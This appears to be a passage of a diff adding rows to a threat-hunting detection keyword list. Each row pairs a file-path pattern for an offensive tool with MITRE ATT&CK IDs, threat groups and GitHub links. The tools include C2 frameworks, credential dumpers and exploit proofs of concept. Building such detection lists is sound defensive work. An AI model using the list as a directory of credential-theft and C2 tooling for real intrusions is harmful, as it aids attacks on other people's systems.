+"*/PupyCmd.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/PupyCompile.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/pupygen.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/pupylib/payloads/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyOffload.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupyps.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyServer.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyService.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pupysh.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyTriggers.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/PupyWeb.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/putter.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/PwnDB.py*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. 
Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" +"*/pwndrop.git*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","1","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*/pwndrop.ini*","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" +"*/Pwned.as*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/PwnKit-Exploit*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" +"*/pxesploit/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/PXEThief*","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","220","27","2023-05-18T19:55:17Z","2022-08-12T22:16:46Z" +"*/pxexploit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/py_oneliner.py*","offensive_tool_keyword","pupy","Pupy is an opensource. 
cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/py2exe/*","greyware_tool_keyword","py2exe","py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","Operation Wocao","N/A","Execution","https://github.com/py2exe/py2exe","1","1","greyware_tools high risks of false positives","N/A","7","646","83","2023-09-25T23:45:56Z","2019-03-11T13:16:35Z" +"*/pyasn1/*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 
FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*/pycobalt-*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*/pycobalt/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*/PyExec.git*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" +"*/pyinstaller/*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*/pykiller/CVE-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/pykiller/CVE-2022-23131","1","1","N/A","N/A","1","0","0","2022-02-24T11:59:48Z","2022-02-24T11:34:27Z" 
+"*/pyLAPS.git*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" +"*/pyLAPS.py*","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","50","9","2023-10-01T19:17:01Z","2021-10-05T18:35:21Z" +"*/pypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*/pypykatz.py*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/skelsec/pypykatz","1","1","N/A","10","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*/pyrdp.git*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*/pyrdp:latest*","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1296","235","2023-07-28T14:33:09Z","2018-09-07T19:17:41Z" +"*/Pysoserial.git*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","1","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" +"*/pystinger.zip*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*/Python-dynload-os.h*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/pywerview*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" +"*/pywhisker.git*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"*/pywsus.git*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. 
The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" +"*/pywsus.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/pywsus-master.zip*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" +"*/qakbot.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
